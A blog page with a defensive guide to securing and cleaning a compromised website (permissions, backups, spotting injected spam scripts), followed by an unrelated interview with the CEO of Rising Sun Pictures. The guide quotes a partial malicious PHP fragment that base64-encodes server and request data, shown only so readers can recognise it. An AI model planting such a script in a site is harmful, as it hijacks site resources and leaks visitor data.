debfoocode.net

One thing you should never take for granted, is the security of your website. All it takes is for one folder to have the wrong access permissions assigned to it, and someone has found a way in. Just as Google (and all other search engines) send out their spiders and robots to scour the Internet looking for sites and links, so are spammers, sending out scripts that look for a folder or site that they can exploit.

Once they have found a folder, they tend not to make it too obvious to the web owner. Instead, they plant a script in the folder that allows them to redirect sites (spam ones) from your web site, using up your bandwidth. The file typically looks like a normal script and can remain unnoticed for quite some time.

The first thing to do to improve the security of your site, is to check that the permissions on each folder and file are set to the right level. There are several ways to set the permission levels (depending on which server that you use). If your website is on an Apache server, you would use Unix commands to set the permissions. The command to set the permissions is chmod. For a detailed explanation on chmod, have a look at the wikipedia site: http://en.wikipedia.org/wiki/Chmod

Basically, you would not want any directory or file to have the chmod permissions of 777. These permissions give everyone (owner, group, and public) read, write and execute permissions. If you come across any directories with these permissions, change them to 755. Images and files should have the permissions of 644.

Another important thing to do with your website is to perform a regular back up. If anything or anyone compromises your site, you can at least have a ‘safe’ copy of the site that you can either install over the top, or refer back to.

How to Tell if Your Site Has Been Compromised

Regularly checking the statistics of your website is a great way to see if anything unusual is happening. Statistics are provided by the web host through cPanel, and contain such tools as ‘Latest Visitors’, ‘Awstats‘ and ‘Webaliser‘. Latest Visitors shows the last 300 people that have accessed your site. Have a look at your Latest Visitors, and check that everything appears normal.

Things to look out for are: /images/2007/08//someFileNeverSeenBefore.html

The point that I am trying to make here, is to look for files that appear to be coming from a directory on your site. What might start off as a few of these strange files, can quickly turn in to hundreds.

What to Do if Your Site Has Been Compromised

If you happen to find suspicious links coming from your site, or you have found malicious scripts running from your directories, you will need to go over everything in the infected area (whether that be a particular folder, or the whole site).

To be extra cautious, it would pay to do a complete back up of the site. At the very least, if you delete the wrong file, you can always restore it. It is also a lot easier to go over the files when they are located locally on your PC. To further test your files, you could run a virus scanner over every file.

Once you have located the malicious script, delete it. Basically, any image directory should contain only images (this is particularly useful for WordPress users). There should not be any .HTACCESS files located in the directories. Unless of course you have created it, and you know exactly what it does.

An example of a partial malicious file is:

["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($d).”.”.base64_encode($e).”.”.base64_encode($f).”.”.base64

An explanation of what this type of file is doing can be found here.

Once the file in question has been erased, I would go over every single file/folder in the infected area and check that the permissions are correct. To be on the safe side, I would replace every file in the infected folder/s with a safe backed up version. Depending on where the compromise took place, you may need to change all of your passwords.

When you are happy with the changes to the site, you should delete the backed up ‘compromised’ version of the site.

An additional point of reference is the Google Webmaster site. This site can be used to remove dead (rogue) links and also to see who is linking to your site.

To use the Google Webmaster site you will need to verify your site first. The Google Webmaster site will explain exactly what you need to do to verify your site.

Finally, if there is anything you would like to add to this post, or if there is anything that I have left out that should be mentioned, please let me know. Helping people combat spammers is in the best interest of every decent web owner.

It is with great pleasure to be able to introduce Didier Elzinga as the latest ‘Interview with an IT Professional’. Didier Elzinga is the CEO of Rising Sun Pictures, Australia’s leading visual effects company. Rising Sun Pictures have been involved in producing visual effects for many Hollywood blockbusters, including the latest Harry Potter movie (Harry Potter and the Order of the Phoenix), as well as Charlotte’s Web, Superman Returns, Batman Returns and Lord of the Rings: The Return of the King (to name a few). For more information on Rising Sun Pictures, check out their website: www.rsp.com.au

A graduate of Adelaide University, you studied Computer Science before applying as a software engineer for Rising Sun Pictures. What was your career like prior to becoming the CEO?

I started at RSP straight out of uni and worked in a range of roles across the company. I started life as a software developer (writing tools for motion control rigs and colour conversions), moved into compositing (2d image processing), then onto films, running a small team, supervising, operations management, CTO (chief technology officer), head of vfx and ultimately CEO. I tried to leave twice – got convinced to stay, co-founded a software company with the founders of RSP, started a food business and generally made sure I had too much to do.

It is so amazing how someone so young could become a CEO. What was it that made you want to stop developing for the company, and start leading?

Part of it was that someone needed to do it. The other part was that I was naturally a good generalist and I enjoyed problem solving and working with people. By moving into a leadership role I found I could add more value to those around me than by trying to do it myself. Within a couple of years the results, both technically and creatively, that those I was working with were achieving dwarfed what I could have done if I had just kept relying on my own skills.

Were you faced with any challenges once you took on the role of CEO?

Absolutely. Not long after I started working as CEO we made a strategic shift to focus purely on film that almost killed us when the market vanished as a result of 9/11 & a screen actors guild strike. As evidenced by being here today we survived ….

What has been the biggest highlight so far in your career?

Winning work on “Lord of the Rings: Return of the King” was, at the time, a pretty huge thing. On the whole though it is more a collection of small wins and satisfaction in the path we have taken than a single moment.

What would you like to achieve that you haven’t already?

Organisationally winning an Oscar and VES (Visual Effects Society) award for best VFX would be up there.

Your career and what you have achieved is inspirational to young people studying computer science all over the world. What advice would you give to people wanting to follow in your footsteps?

Computer science at it’s heart is about understanding how to cope with complexity and to use abstraction. As such it is a great starting point for a career in many areas – just remember that writing software is only a means to an end not an end in itself.

I love that Rising Sun Pictures, Australia’s leading visual effects company is based in Adelaide, with another office in Sydney. What are some of the benefits you have found by having the company based in Adelaide?

There is a shared culture of being able to do the work from anywhere. People in Adelaide tend to bag the city a lot – but then don’t get out and go somewhere else or do something about it. I love the city, like living here and am unapologetic about what it is. We are a smaller city with a great quality of life and we are also a stage upon which you can compete with the best in the world. (Not to mention the advantage of being in some of the best wine county in the world).

What have been some of the challenges?

Culture and people are always the biggest challenge. No matter what you have achieved every day you have to earn the respect of those who work for you and those you want to work for you.

Rising Sun Pictures has worked on many blockbusters, including the recently released Harry Potter and the Order of the Phoenix, and other impressive features like: 28 Weeks Later, Blood Diamond, Charlotte’s Web, Superman Returns, Harry Potter and the Goblet of Fire, Batman Returns, The Last Samurai and the Lord of the Rings: Return of the King.

How did Rising Sun Pictures manage to land deals with the biggest movie studios?

Persistence. We understand what we are good at and we work very hard at finding people who value that. Once we work with someone we do our best to develop that into a long term relationship. The rest of it is just hard work.

How were you able to overcome the challenges of working on projects with teams of people based all over the world?

Hollywood is quite good at playing the global game – and as Australians all our customers are thousands of miles away. You accept that and learn to live with it as a reality. And you get up very early and go to bed very late to cover all the timezones …

As a huge Harry Potter fan, are you able to say what scene/s Rising Sun Pictures were involved in with the recently released Harry Potter and the Order of the Phoenix?

We worked on a range of sequences across the film – with the main one probably being the exterior of the Grimwauld Place house as it emerges from between two other buildings.

According to your website, you are currently looking to recruit more people. How would you describe a typical day at the Rising Sun Pictures office?

There is no such thing as a typical day It depends on your role and what projects are on but the heart beat of our company is whatever films are currently in the building. Several times each day we will review the material we are working on (in dailies or smaller meetings) and for the rest we are working to a schedule on our own work or focussing on improving the environment around us – be it by writing code, setting up training material or debating a decision about what the company should do in a specific situation.

What should people expect if they are lucky enough to land themselves a job working for Rising Sun Pictures?

Lots of hard work. The film industry is notoriously high stress and impact at the pointy end of a show (although we do our best to minimise that). Also an environment in which you are expected to have an opinion and to get involved.

There is nothing worse than someone saying “somebody should”.

What are the future plans of Rising Sun Pictures?

Depends a little on what projects we win but the current plan is to continue to focus on high end hollywood visual effects, consolidate our position as Australia’s most credited film visual effects company and build up our reputation as one of the world pre-eminent vfx boutiques.